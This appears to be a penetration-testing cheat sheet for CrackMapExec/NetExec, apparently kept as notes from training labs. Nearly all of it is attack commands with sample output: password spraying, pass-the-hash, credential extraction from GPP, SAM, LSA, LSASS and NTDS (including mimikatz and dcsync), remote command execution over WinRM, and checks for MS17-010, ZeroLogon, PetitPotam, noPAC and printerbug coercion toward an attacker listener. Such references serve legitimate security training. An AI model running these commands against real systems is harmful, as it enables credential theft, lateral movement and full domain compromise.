NetExec - CME

Wiki

CME

crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>

$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Domain SID

nxc ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid

Outdated OS

nxc ldap IP_RANGE -u username -p password -M obsolete

EternalBlue - MS17-010

[Apr 08, 2024 - 02:26:06 (EDT)] exegol-CPTS /workspace # nxc smb "10.129.201.97" -u '' -p '' -M ms17-010
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
SMB         10.129.201.97   445    SHELLS-WINBLUE   [*] Windows Server 2016 Standard 14393 x64 (name:SHELLS-WINBLUE) (domain:SHELLS-WINBLUE) (signing:False) (SMBv1:True)
SMB         10.129.201.97   445    SHELLS-WINBLUE   [+] SHELLS-WINBLUE\: 
MS17-010                                            [+] 10.129.201.97 is likely VULNERABLE to MS17-010! (Windows Server 2016 Standard 14393)

Printerbug

nxc smb IP_RANGE -u username -p password -M printerbug -o LISTENER=ATTACKER_IP

Source: https://x.com/al3x_n3ff/status/1770238201598267468

Password policy

crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol

Password Spraying

SMB Bruteforce

crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success

cme smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success

SMB

SMB (445, 139) / RPC

$ crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

SMB         10.129.42.197   445    WINSRV           [*] Windows 10.0 Build 17763 x64 (name:WINSRV) (domain:WINSRV) (signing:False) (SMBv1:False)
SMB         10.129.42.197   445    WINSRV           [+] WINSRV\user:password 
SMB         10.129.42.197   445    WINSRV           [+] Enumerated shares
SMB         10.129.42.197   445    WINSRV           Share           Permissions     Remark
SMB         10.129.42.197   445    WINSRV           -----           -----------     ------
SMB         10.129.42.197   445    WINSRV           ADMIN$                          Remote Admin
SMB         10.129.42.197   445    WINSRV           C$                              Default share
SMB         10.129.42.197   445    WINSRV           SHARENAME       READ,WRITE      
SMB         10.129.42.197   445    WINSRV           IPC$            READ            Remote IPC

Users List

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users

Logged-on users

$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Autologon users

nxc smb IP -u username -p password -M reg-winlogon

Source: https://x.com/al3x_n3ff/status/1774787873104900448

Active sessions and running tasks

--qwinsta: Enumerate active sessions on the target, including numerous useful information
--tasklist: Enumerates all running tasks on the host

Group Password Policy - GPP

nxc smb 10.129.202.85 -u jmarston -p 'P@ssword!' -M gpp_password

$ crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\forend:Klmcargo2 
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [+] Found SYSVOL share
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [*] Searching for Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [*] Found INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  [+] Found credentials in INLANEFREIGHT.LOCAL/Policies/{CAEBB51E-92FD-431D-8DBE-F9312DB5617D}/Machine/Preferences/Registry/Registry.xml
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Usernames: ['guarddesk']
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Domains: ['INLANEFREIGHT.LOCAL']
GPP_AUTO... 172.16.5.5      445    ACADEMY-EA-DC01  Passwords: ['ILFreightguardadmin!']

Dump SAM

SAM & LSA secrets

You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

Dump LSA

SAM & LSA secrets

You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa

If you found an account starting with SC_GMSA{84A78B8C-56EE-465b-8496-FFB35A1B52A7} you can get the account behind:

nxc ldap <ip> -u <user> -p <pass> --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724:01000000240200001000120114021c02fbb096d10991bb88c3f54e153807b4c1cc009d30bc3c5<---SNIP--->cd88f866c12160313f9e6884b510840e90f4c5ee5a032d40000f0650a4489170000f0073a9188170000'

Dump LSASS secrets

LSASS secrets

nxc smb 192.168.255.131 -u administrator -p pass -M lsassy

nxc smb 192.168.255.131 -u administrator -p pass -M nanodump

nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz

nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"

SMB Module handlekatz: [*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz

SMB module procdump: [*] procdump Get lsass dump using procdump64 and parse the result with pypykatz

Dump NTDS

NTDS secrets

#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

#~ nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' -M ntdsutil

Pass the Hash (PtH)

#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ nxc smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ nxc smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ nxc smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'

WinRM

WinRM (5985, 5986)

$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Command Execution

Executing Remote Commands | NetExecwww.netexec.wiki

[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB         10.129.202.136  445    WINSRV           [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM       10.129.202.136  5985   WINSRV           [+] WINSRV\john:november (admin)
WINRM       10.129.202.136  5985   WINSRV           [+] Executed command (shell type: powershell)
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Directory: C:\
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Mode                LastWriteTime         Length Name
WINRM       10.129.202.136  5985   WINSRV           ----                -------------         ------ ----
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                PerfLogs
WINRM       10.129.202.136  5985   WINSRV           d-r---       12/14/2020   6:38 PM                Program Files
WINRM       10.129.202.136  5985   WINSRV           d-----        2/11/2022   6:10 AM                Program Files (x86)
WINRM       10.129.202.136  5985   WINSRV           d-r---         1/6/2022   6:49 AM                Users
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                Windows
WINRM       10.129.202.136  5985   WINSRV           
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace #

SSH

SSH (22)

nxc ssh 10.129.245.201 -u sam -p mut_password.list

LDAP - Users

To enumerate all users via LDAP:

nxc ldap $ip -u $user -p $password --users

To enumerate just the active users via LDAP:

nxc ldap $ip -u $user -p $password --active-users

Scan for vulnerabilities

Windows Exploit

Scan for multiple vulns

nxc <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M spooler -M printnightmare -M shadowcoerce -M petitpotam

ZeroLogon

nxc smb <ip> -u '' -p '' -M zerologon

PetitPotam

nxc smb <ip> -u '' -p '' -M petitpotam

noPAC

nxc smb <ip> -u 'user' -p 'pass' -M nopac

PreviousMimikatz NextPowerView

Last updated 9 months ago